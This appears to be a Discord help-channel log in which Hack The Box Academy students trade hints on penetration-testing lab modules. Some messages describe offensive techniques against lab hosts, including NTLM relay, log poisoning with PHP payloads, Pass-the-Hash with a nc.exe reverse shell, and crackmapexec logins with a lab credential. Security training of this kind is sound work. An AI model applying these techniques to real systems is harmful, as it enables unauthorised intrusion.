You can use Google for it, however, don't forget to establish an SSH session with the target

OSI, on the other hand, is a communication gateway between the network and end-users. The OSI model is usually referred to as the reference model because it is newer and more widely used. It is also known for its strict protocol and limitations.

Im pretty sure TCP/IP is more widely used.

This is Introduction to Networking , section Networking Models

Yes you can. I used Google for that task. I didn't google the answer though but I found something related.
And I thought to myself if this command does this why not try it for this task and see if it'll work.
It did and I got the path.

In the assessment part of broken authentication is it designed to redirect in the /login.php despite having the the OTP?

nvm I was able to figure it out.

Module: NTLM Relay Attacks
Section: NTLM Cross-protocol Relay Attacks
Question: Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.

I keep getting this error:
Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

Any help?

nvm fixed it.

Module: Sqlmap Essentials
Section: Attack Tuning
What's the contents of table flag6? (Case #6)

i solved the question, but i was just confused because i thought i solved it in a different way, i only used level and risk and other options without using prefix, but still got the flag is it normal? or i should've used the prefix?

Ty 🙂

U welcome

I have a question about log poisoning . Adding (somehow ) a php payload to a log file e.g. /var/log/nginx/access.log and then we are able to request that file (through LFI) why the php code will be executed ? This file is not .php file so the web app shouldn’t read just a text ?

I'd advise reading the first paragraph of that section again 🙂

You can poison the log in a myriad of ways. If the server is capable of executing php code, then you can poison with php

Hey on the module "Introduction to Windows Command Line" on "Command Pronpt Basics" , the awnser to the question is not working.
"In what directory can the cmd executable be found"
Ive awnserd "System32" "system32" and alwys gives wrong awnser.. am I missing something? Thank you 🙂

Hey, does anyone know why this answer is incorrect? I'm assuming its some strange formatting I'm missing, as has been the case throughout this module.

It helps to provide the module and section name for others to sanity check you

Ah apologies. It's Networking Foundations, section 10, question 6 :)

Sec, ill check what i put in

Thanks :)

Also section name not #

Ah, network Security

I cant be fucked to count the sections lol

Apologies, new to academy haha, just thought I would give it a try for the certs

Its dumb formatting

a-b detection

Assumed so, this module has been infuriating with formatting

Ah, thanks so much

Oh that also doesn't work

Tbh I think that deserves an #1234357888114364508 because that makes it a compound word, so 2 word answer not 3

Its not literally a-b

Oh lmfao. i take things way too literally

I was providing the format, not the answer

I rarely, if ever, will just give the answer

Yup, just needed a hyphon in my previous answer

Will post that in #1234357888114364508 then, as previously in this module they set precident that hyphonated words are 1 word

Thanks for the help :)

Im facing some issues , while trying tools on my local machine it dosnt work but it works on the attack box given my HTB , the ip is active and im getting the services here there are no syntax issue (ive used the same command on the attacking machine too)

Hi, someone can help me with SQL Fundamentals, the new skills assessment? I passed the login portal, and I think where is the next injection field, but not even answer the first question.

Hello everyone,

I’m considering the Gold – Advanced Cyber Security plan

Will I get access to Tier 3 modules if I enroll?

dm me

?

In Abusing HTTP Misconfigurations Tools & Prevention we are told to "Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application." I got really frustrated with this one. The only way I was eventually able to solve it was to install the exact same version of the tool used in the module: WCVS v1.1.0 and then I had to specify the cache header manually. I hope that this helps anyone else who is struggling with this in the future.

Hoping someone can give me some more clarification on this part of Linux Privilege Escalation | Docker - Is https://<parrot-os> supposed to be an IP or link of some sort? I'm just not really sure what to be putting here.

there's likely more context around this that you might need to read but i'll double check. I don't recall it being that confusing

ah ok it's referring to using your attackbox to download the file to the container

so <parrot-os> would be your system (it's using https:// and :443 here to imply you can use any port combo/etc)

directly above that codeblock

If not installed, then we can download it here and upload it to the Docker container.

So you'd just need whatever "VM" you want e.g. parrot/kali downloaded as a docker file on your attack box?

no

this is specifically just transferring the docker binary to the target; as stated in the reading directly above that codeblock

i literally just read the context above that codeblock and that cleared up all the confusion you showed here. Always look for context surrounding something you're confused on

this is just showing a file transfer from a system to another; maybe it can be clearer that it's your system. But it's just a filetransfer (in this case a web server) to download the docker binary, the following example is using the docker binary to escalate/escape

on the skills assessment for shells & payloads, two of the "hints" provide some credentials. Are these credentials actually available through enumerating the boxes? or do you just have to look at the hints to find them?

I don't even know where to ask this, but doesn't referring friends give cubes?
I referred 2 friends who have both said that they have completed the intro modules, yet I got no cubes from it all.

look at the desktop of the jump host you're provided

https://help.hackthebox.com/en/articles/7992318-friend-referral

you only get cubes for t2+ module completion; with the caveat that tier 2 completion doesn't count if the user has an active student sub

Ah thanks. I thought this counted as well.

If it is only T2 modules, then alrighty. Thank you for the info

up to

5, 10, 20 reward tier -> total 35

Ah, neat.
Would be nice if that was shown in the referral page itself, haha

/feedback

Howdy 👋🏾

I'm looking for help with Intro to Android Application Static Analysis Skills Assessment

I manage decompile the APK, including the Hermes JavaScript bytecode. I've search for keywords that could lead to showing a POST request for the flag but I've come up with nothing. Additionally, I don't see any possible logic to patch in order to cause the APP to reveal the flag. I'm probably not looking in the right place but I think I've reach my limitation on where to search. If anyone can give a hand or point me to the right direction, it would greatly be appreciated.

Update: Made progress. I discovered an endpoint that I missed.

options

https://academy.hackthebox.com/module/77 ? Somewhere to get started in Academy

Hi, I looked into it and there was indeed an issue with the lab. I pushed a fix just now, the lab can now be solved using the latest version of wcvs out of the box. Thanks for reporting 🙂 If you want to verify, feel free to take another look at the lab

yo guys, im having a problem in web attacks -> XXE injection

anybody i can DM ?

send me

Try adding -Pn to the nmap scan

But in reality just run a ping sweep from the host to find other internal hosts

Also deleting the post bc the module is above tier 0, and you're posting spoiler info

Working on Linux Privilege Escalation | Logrotten I can't get logrotten to even run. Transferred the compiled exploit via scp --> didn't run. Tried grabbing with git clone and wget, on the target, also doesn't work. Am I missing something?

You need to trigger it, its a race condition so it may not always work the first time

Also dont try and get a privileged shell, instead try to copy/move files

Anyone done the android series got some setup problems i would like to ask a couple things about. I remember i had this working a couple of months ago when it was first released but going back to it know the emulator starts but it so slow you cant work with. Nuking it didnt help, rendering on h/w seems to take forever to connect.

oh sorry, I did not think about it, won't happen again

Try adding -Pn to the nmap scan
it won't work because -Pn prevents ICMP packets. And I tried to do send them via nmap just like it is shown in the walkthrough.

But in reality just run a ping sweep from the host to find other internal hosts
yes I ping sweep from meterpreter worked

but still that nmap via proxychains doesn't work and in the walkthrough it is shown as a working example
Also rdp_scanner should not throw errors, most likely something is broken in the lab. I'm not trying to complain, I just spent time and efforts to make things right, so I'm just reporting it because I believe others may struggle as well. Maybe if rdp_scan doesn't work we can add a Note saying in the lab it doesn't work. The same for nmap?

At any case thank you

If the lab is broken, reach out to support. Proxychains generally doesnt play well with ICMP

Personally, I use ligolo for pivoting.

The main thing is consistency

don't use one style for one thing then switch to another style for another

also technique-based can have a section that also provides the CWE value, meaning that you can supply both root cause/impact. Just be consistent with how you present and defend your finding

Attacking Common Applications - First Skills Assessment: Is it normal that the vulnerable application is full of 404 pages?

There's a small error on https://academy.hackthebox.com/module/167/section/1623
"Introduction to Windows Command Line"

Who do I tell?

problem is the exercise doesn't contain the auth for the server, soo hard to complete.
Found it on the next page.

Its the same user/pass for most of it, but #1234357888114364508

Thanks you repoted it and anoter bug on the page after it as well. 🙂

Says to use SSH 😛 buuuut it's RDP.

is ssh not open?

Haven't actually checked, but module tells me to use powershell, is that possible through SSH?

I just used RDP and worked fine and I could complete 😛 So maybe i just found another way

yes it's possible through ssh

if ssh drops you into cmd; you just type powershell hit enter and boom... powershell

also ssh drops you into the shell/terminal environment, it isn't by itself a terminal environment just a communication pathway

Daaaamn you are the man, haven't thought of that...

I juse found RDP and thought why not

in most cases RDP will be enabled on windows machines. however not always

Would be hella lot quicker also without UI 😛

Windows sluggish as always

Is there a way to force it into powershell or do I have to execute it after entering target?

you can't force it

Gotcha so I'll just get it tattooed so I won't forget

sometimes the environment set up for ssh is powershell, sometimes it's cmd. but it's effortless to swap between

Nice to know that little trick 😄

https://tenor.com/view/coach-josh-wood-coach-josh-gold-star-gold-star-gif-593378152944786379

Which channel is best for asking assistance with a VPN issue on Academy?

if you're having a vpn issue your best bet is reaching out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

but a 'vpn issue' is vague

I had a few problems myself, which I've sorted, so shoot 😄 But more details

I am on the Skill Assessment on the Windows Lateral Movement. I am Stuck on the fourth Question. I think i Need a sanity Check on my malicious Patch. Anyone available for an DM?

Yeah you can DM me.

nm, thank you, I see the initialization completed.

Hi all, I am on the Skill Assessment on the Windows Lateral Movement too and stuck on the last question. Anyone can give me a nudge ? nvm, got it.

i just wasted an hour on this

Can someone give me a nudge for Q4 of the MSSQL, Exchange, and SCCM Attacks -> Skills Assessment, I need to get access to the SCCM server but cant figure it out

@runic lance please dont reveal answers/ways to get answers for modules above tier 0.

oh ok

Hi All, have a problem with 1 question in DNS Zone Transfers, can't zone transfer on non of both ns for inlanefreight.htb. What may be wrong?

You need to specify the ip as the nameserver dig axfr inlanefreight.htb @ip

👍

Enumerate mssql

Thanks, I realised i was being blind

I finally completed the CAPE pathway

for network services on password attacks what is a reliable tool to crack winrm credentials ? i am running into errors with evil-winrm and netexec ...now using metasploit but its slow

what error are you getting with nxe?

is it the latest version?

https://github.com/cve-search/cve-search/issues/1099
https://github.com/cve-search/cve-search/pull/1095

Please update and upgrade your Kali system. This error is likely due to outdated packages.

I don't think that hydra supports winrm brute forcing like that.

i reinstalled ..its working now

these tools can be a pain at times

I'm doing the one question for Get-WinEvent section of Windows Event Logs and Finding Evil module. I am trying to filter the output to get the specific share. I am trying to use the commands talked about in the section but its not working.

Can someone help me out?

uhh, did you run cmd instead of powershell?

I am unable to download the ssh key from smb share the download gets failed everytime this is in the module attacking common services section attacking smb I tried using smbclient, smbmap and even tried to mount the share but didn't work, even though got the flag from another service

dm me

No

I ran powershell

Will try again tomorrow

Some commands give too much output to sift through and others provide just straight errors

Anyone done the windows lateral movement skills assessment? Need some help. Can you DM me ?

Is there any way I can see the people I follow?

Hi all, do you know who I can message from HTB academy to resolve a module issue?

I was referred to #1234357888114364508 for Module Errors. Did you post there?

@last hedge please do not share answers even if you use 'spoiler' tags

it depends

if it's an ACTUAL module issue; then -> #1234357888114364508 with the problem
If it's an issue with how you're performing the task, then just ask here. But there's more context needed

(Moving question here) - Active Directory PowerView Module - (Potential bug?)
Hey all! I've got a question regarding PowerView and the environment of the mentioned Academy module.

-Module Question: "Find a member of the Administrators group in a different domain"
-My Assumption: Use PowerView to enumerate the admins group of the other domains using -Domain.

Pretty straightforward, and exactly what the module said to do in the guide. However, whenever I use the flag, it throws the attached error.

Now, I've already found the question answer (through a non intended route), but I was more curious about why a lookup in another domain failed if the Trust relationship is Bidirectional, especially because the Module made a point to say that Users from both Domains could query Users/Resources in the opposite domain. From what I understand, this error implies the opposite of that. Anyone have any insight?

Troubleshooting: I was told that this was a collision issue with the ActiveDirectory PowerShell module being loaded alongside PowerView, but I've verified that it is unloaded, while PowerView is loaded.

Thanks - I suppose maybe it is module feedback more than anything? I love HTBacademy and have got a lot out of it. But the Web Service & API Attacks module really is not up to the high standard of the rest of the platform. The order of material makes no sense, it's very hard to follow, concepts are introduced in the challenges that are not covered in the content. Honestly I would like a refund of cubes if possible.

refund is unlikely, but you'd have to reach out to support. as far as feedback, once you finish the module you're free to leave a review on it

also higher-tier modules tend to have concepts that require some baseline understanding to be able to work through with little trouble

i.e. a module focusing on NoSQLi will assume you know about SQLi

per the module overview page:
In addition to the above, a firm grasp of the following modules can be considered as prerequisites for the successful completion of this module:

• Linux Fundamentals
• Introduction to Python 3
• Web Requests
• Introduction to Web Applications
• Using Web Proxies
• File Inclusion / Directory Traversal
• Attacking Web Applications with Ffuf
• Cross-Site Scripting (XSS)
• SQL Injection Fundamentals
• SQLMap Essentials
• File Upload Attacks
• Command Injections
• Server-side Attacks
• Web Attacks

The module is classified as "Medium" and assumes a working knowledge of the Linux command line and an understanding of information security fundamentals. The module also assumes basic knowledge of web applications and web requests, and it will build on this understanding to teach how web service/API vulnerabilities can be exploited.

fair enough - I'm not trying to be difficult, it just feels as an end user that compared to the normal quality of well-thought out modules, this felt like a poorly organised shopping list of information.

To give an example, the Command Injection module was brilliantly laid out, really easy to follow, easy to learn from. This one feels very different.

I'm not here saying it is not as advertised - I'm sure the bullet point list and disclaimer are accurate. My point is that the content is not clearly communicated and is a much lower quality. It's a shame the response is very defensive (i.e. the customer is shown the disclaimers) rather than engaging with the core feedback of low quality feedback. But I appreciate I did ask for a refund, and it's a business, so there is that

no you're good i just wanted to get where the frustration is from; is it from the lack of overall context or it not explaining what it's doing well

like underlying concepts should be known, sure, but the explanation of the attack is lacking

i'm not staff btw; just trying to help better form your feedback (if that makes sense)

ahhh right that's my bad 🤣 immediately went into Karen mode when you're not staff. Apologies 👍 I will look for the feedback at the end and give it there. Thanks for the info

Hello guys! i am at the Dynamic Port Forwarding with SSH and SOCKS Tunneling module and i am trying to use nmap with proxychains for the second question of the module. when i scan i get All 1000 scanned ports on 172.16.5.19 are in ignored states. any ideas why this happen ?

• sudo proxychains
• nmap -sT

i see! sudo worked! but why ?

If you used the command above the one you're asking about in the section, then I'm pretty sure you did it the intended way. That doesn't answer your question about why the command you're asking about failed though

because proxychains is dumb sometimes

Yeah, what's crazy is that you can literally use the exact "Get-DomainUser -Domain <opposing domain>" command the Guide used, and it will fail while the Guide's command succeeds:

Which is why I think this may be a bug

My guess would be that since it's not needed for the exercise, maybe that access just isn't configured. I did this section yesterday and never gave it a second thought

Documentation & Reporting module had no business being that good 🔥

Wait what command did you use for that last question, then? ("Find another user in the Administrators group from another domain") I would have assumed that you definitely use the "-Domain <target domain>" flag since the module uses it directly to enumerate users in the other domain, so I figured you'd do the same but with Get-DomainGroupMember or similar.

Na, read the section right before that. You're looking for a user from a foreign domain that is in a group in the current domain

That hurts so bad lmao

My question does still stand, but thank you for clarifying that for me. I do still think enumerating the other domain with powerview should work (since it did for the Guide), but that's good to realize that it wasn't necessary for the question alone.

imo that's the hardest part of academy. Reading the question properly and the content... i've done it too many times where I swear i read it... then scroll up and go 'oh'

yeah, I suppose maybe I saw it originally but my method still should have worked, consdiering it would have enumerated all Administrator users in the other domain's group

also the reading doesn't always go 1::1 with what you can do

Ahhh, I haven't run into that yet. I thought that if the guide did it explicitly in that environment, that you'd be able to do it in order to explore the tools

Regarding this, this may just be my ignorance with how Trusts & PowerView works, but does this mean that the environment that you answer the questions in "fakes" being a Bidirectional Trust, somehow?

That's the only way I could imagine PowerView not being able to enumerate the opposing Domain Users via the Bidirectional Trust when the module Guide explicitly says it can (and demonstrates it).

could just be a weird thing with powerview

¯_(ツ)_/¯

don't have enough exp to be able to really elaborate on it

by 'guide' do you mean the guide with the annual sub, or the reading

just to be clear

Like literally the reading above the questions in that module section - they show the command i tried running and it gives them output, but when I try it in the environment provided with the questions (same domains, users, groups, everything) - it fails.

ah; the 'reading' isn't a 'guide' per-se

Oh, what would the guide be in that case?

the guide would be the writeups provided via the annual subscription

that explicitly tells you commands

Ohhhhhhhhh I didn't even know those were a thing, that's why

Dang lol

i generally recommend against using those tbh

Yeah I kinda feel like exploring and finding your way is more fun

because they don't explain anything, just provide commands and answers

so very little actual learning

(the learning is assumed from the reading)

and very few times do they give a reference to the reading in them

Yeah, I like being able to explore around and come to the answer by re-reading the Readings and messing with different flags or methods of doing them

(which may have bitten me in the ass in the end but I'm still curious)

Huh, yeah though, I guess we just kinda chalk it up to a weird environment/PowerView thing then? I might leave my #1234357888114364508 post up in case someone knows the technical limitation being encountered.

hello all, guys in the -Active Directory Enumeration & Attacks module

at Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

at Accessing DC03 Using Enter-PSSession

the command was PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
from where we obtain the administrator password?

it helps to provide the module name btw

Active Directory Enumeration & Attacks

this isn't the task presented to you

read the task again. You don't need to access DC03

the question not to solve the question, i want to learn

not everything you see will be replicable, if the administrator password hasn't been provided then you won't be able to perform this action

(also maybe try first running powershell as admin)

this message above; #modules message

always i do

1. the module is above tier 0; please stop posting images from it
2. the administrator password would explicitly be labled under the user 'administrator'

please remove the images from this post as they contain content directly from a module above tier 0

sure

thanks ❤️ good luck

what do you mean "the administrator password would explicitly be labled under the user 'administrator'"?
i didnt find it

it means that IF it's available, then there would be an 'administrator' user that it would be under. I suggest moving on.

ok, thank you

yo guys, im on web attacks -> skill assesment
can anybody give me a tip
i feel im relying too much on help but im stuck anyways

Where are you stuck ?

ive found an IDOR vulnerablility for account information disclosure

but it dosent seem the one that will lead to file inclusion

and i cant find anything interesting after

Don't spoil here you can come dm

hello guys, anyone has solved this lab?
https://academy.hackthebox.com/module/298/section/3423
I’ve already found the answer, but I’m not sure about the correct format answer for vendor name—where should I confirm it?

Need help on "Pivoting, Tunneling, and Port Forwarding -> Meterpreter Tunneling & Port Forwarding"

I perform the ping sweep, but the IPS I get are not the right answer

Which question is it?

You put the wrong subnet from what I see

You should put the internal subnet as RHOSTS.

the first one

I see, I'll try, thanks

Virtual Hosts https://academy.hackthebox.com/module/144/section/1257 , do i correct using -u parameter in gobuster command for brute-force vhosts -u http://<target_IP_address:port> ? It founds not many domains

Attacking SAM, SYSTEM, and SECURITY on password attacks

is the username ||Unknown User|| or ||gupdate|| ?

@jovial walrus Please take care not to post content from modules above tier 0.

but i am just trying to understand the ans ? i added spoiler

You can just explain your issue without revealing content from the module. Your screenshot included the NT hash of various accounts. Spoiler tags don't do anything.

Did you actually dump the LSA secrets?

i did but the username is weird

its a service name

DM and I can take a look with you

WINDOWS PRIVILEGE ESCALATION
Windows Server

the question : Obtain a shell on the target host, enumerate the system and escalate privileges. Submit the contents of the flag.txt file on the Administrator Desktop.

i tried running exploits locally and remotely via msfconsole , but i did hit errors after error , can someone help ?

Hi guys, is there anyone I could DM about Attacking AI - Application and System Skills assessment? I've ran out of ideas 🙁
EDIT: i think im onto something lol

Cross post here, as this may be the better channel:

• Hacking WordPress
• #cjca message

dm me

Module: NTLM Relay Attacks
Section: Advanced NTLM Relay Attacks Targeting Kerberos

htb-student@ubuntu:~$ cme smb 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' --kerberos
SMB         172.16.117.3    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.117.3    445    DC01             [-] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe KDC_ERR_C_PRINCIPAL_UNKNOWN 
htb-student@ubuntu:~$ cme smb 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe'
SMB         172.16.117.3    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.117.3    445    DC01             [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe

when I try to connect as plaintext$ using NTLM it works, but with Kerberos it says principal unknown, and kerberos authentication is required for the attack to work.

Tried to reset the environment, still the same.

When I tried to abuse RBCD it gave me the same error

Module: DACL Attacks ||
Part: Shadow Credentials
Question 2: Am I really supposed to be using gabriel creds? I see a path from jeffrey through martha but no other...

Then I'd try with what you know.

you dont need to use kerberos auth, you created the computer using ntlm relay so it doesnt have kerberos attributes

@dense lava

This issue was only with using the pre-created 'plaintext$' account, when I created my own it worked

Which is weird

Oh, I think the intent is to use your own, I just turned off my computer so I can't see my notes

Which is weird because if the account can authenticate using NTLM it should be able to authenticate through Kerberos

I used plaintext$ account with previous attacks without having to create my own and it worked

But for this one it required kerberos auth which failed for some reason

Hello everyone, can someone help me to solve this question?please😫

i don't think you can share solutions

its not a solution.. I just compile the pieces that I search in this channel..

then why did you delete them

oopss I edit. lols

I deleted it.

At the top of this channel is a message that states do not spoil module content over Tier 0

¯_(ツ)_/¯

i didn't know community contributors had moderator permissions

i need help, sqli Fundamentals

What is the password hash for the user 'admin'?

i managed to log in.

We can do things within Academy channels.

good to know

I think you have to create the machine account each time you start a new instance. That’s what I did at least

Because of me (no literally)

It saves the effort/time delay of asking a mod to delete something.

you'll need to use some sql stuff to figure that out...

learn sql queries, they're really useful and generally transfer over regardless of database server (MySQL,MSSQL,SQLITE3,MariaDB,etc.)

in general though the proper queries should have been provided to you by the module in some form

I managed to register and log in, but I can't find any vector to perform SQL injection on the page

should probably google then 😉 you're given the name of the application

hmm ok

Where should I post feedback on modules?
In the getting started module, there is a broken link to the rules

Note: During any of your activities through Hack The Box, you must always follow HTB Rules, which can be found on this link.(https://app.hackthebox.com/rules)
--> returns a 404, should be redirected to https://help.hackthebox.com/en/articles/12325897-platform-rules

https://academy.hackthebox.com/module/77/section/729

#1234357888114364508

general feedback? /feedback
feedback about a specific module? #1234357888114364508

@coarse pine while I get you're trying to be helpful, refrain from giving direct answers. That's why I suggested doing a bit of research on the app and vulns instead of straight up saying it

Thanks! Crossposted!

okay

Nope, I re-started the instance like 10 times and plaintext$ account was there each time

NTLM authentication works but Kerberos doesn't

Ye I did. Just thought if there was a path I didn't understand. The question explicitly says to use gabriel...

can someone help me in this module
https://academy.hackthebox.com/module/268/section/3061

they give a hint of where I should look for the flag.. I used a script to check the first 100 ID and I did not get the flag

Subject: Help with Lateral Movement / Pass-the-Hash (Invoke-TheHash)

Context: I am pivoting from MS01 to DC01 using julio credentials. I need to read C:\julio\flag.txt.

The Problem:

Reverse Shell: I can execute a reverse shell using Invoke-WMIExec + nc.exe. I get a connection back (connect to [IP]...), but the shell is blind/unresponsive. Commands like type return no output.

SMB & WMI: I tried copying the flag to a readable share using WMIExec, but I keep getting errors like 0xC000003A (Path not found) when trying to write to C:\Users\julio\Desktop.

Question: Since the shell is blind and I can't write to the user's Desktop, what is the most reliable writable directory on the DC to copy the flag to, so I can download it via Invoke-SMBClient?

I don’t remember having a shell for this

just rememebered we had to use PowerShell #3 Base64 for that question, so i guess make sure you are using that one in revshells and also make sure you are using the right IP address.

Be sure to use base64 encoded reverse shell and set the right target

It should work

Does anyone knows if im doing something wrong with Wi-Fi Penetration Testing Tools and Techniques SA - i made it to the final question. I got everything set up in order to be able to connect to the Inlane-Corp - (Protected EAP (PEAP) authentication, MSCHAPv2 inner authentication, no CA certificate, and the credentials), however the connection cannot be completed, no error provided, just loading and then... nothing happens.

In Linux Privesc module python library hijacking they tell us that once a module content is hijacked we can just run the script with sudo like this:

But how are we able to use sudo on the python3 binary ?

Seems like nothing tells us we are able to

Maybe use sudo -l?

They did not mention it in the module but in fact it is in /etc/sudoers on the lab. I was just confused mb

Anyone having troubles with the SCCM Site Takeover II in MSSQL, Exchange and SCCM attacks module? My won't set up the 443 port making the || /AdminService/wmi/SMS_Admin || endpoint reachable :/

Hi everyone. Does anyone know what username and password I should use to run the exercise in the "Kerberoasting Linux" section of the "Active Directory Enumeration and Attacks" module of CPTS? I haven't found any information about this in the content.

@hidden ledge Please take care not to post content from modules above tier 0

@cloud urchin how often do you watch this chat man

not as much as i used to

i used to exclusively post here, like over 10k messages and none in any other channel

Your stats went to shit buddy 😆

Why the official cpts preparation track has an insane machine (Ghost ) in it ?

Should we expect this kind of difficulty in the exam ?

Don't be put off by the difficulty level. It means absolutely nothing.

So you believe it’s doable ? I mean that insane machine

Everything can be solved

Do it, trust me you'll be glad you did. Also its retired no shame in using writeups and guided mode

Its a really good test of methodology

and now pwnbox is also throwing errors.

┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-wir3mzs8nm]─[~]
└──╼ [★]$ gobuster dir -u $TARGET/nibbleblog/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.129.47.9/nibbleblog/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

Error: error on running gobuster: unable to connect to http://10.129.47.9/nibbleblog/: Get "http://10.129.47.9/nibbleblog/": dial tcp 10.129.47.9:80: i/o timeout (Client.Timeout exceeded while awaiting headers)

Is there any way to fix thsi besides restarting the target which I have already tried?

Did the target start correctly? Restart it and wait 5 minutes. After that, everything should be loaded correctly and ready to go.

im trying to do the security analyst course but im stuck at this question

During recovery, IOCs are still observed intermittently. Should recovery proceed, or should the case be escalated back to the investigation phase? Answer format: Recovery/Investigation

Can someone give me some hints what the answer can be ?

There seems to be an issue with the VM. Will have it patched and redistribute.

Tried this too. Does not appear to help.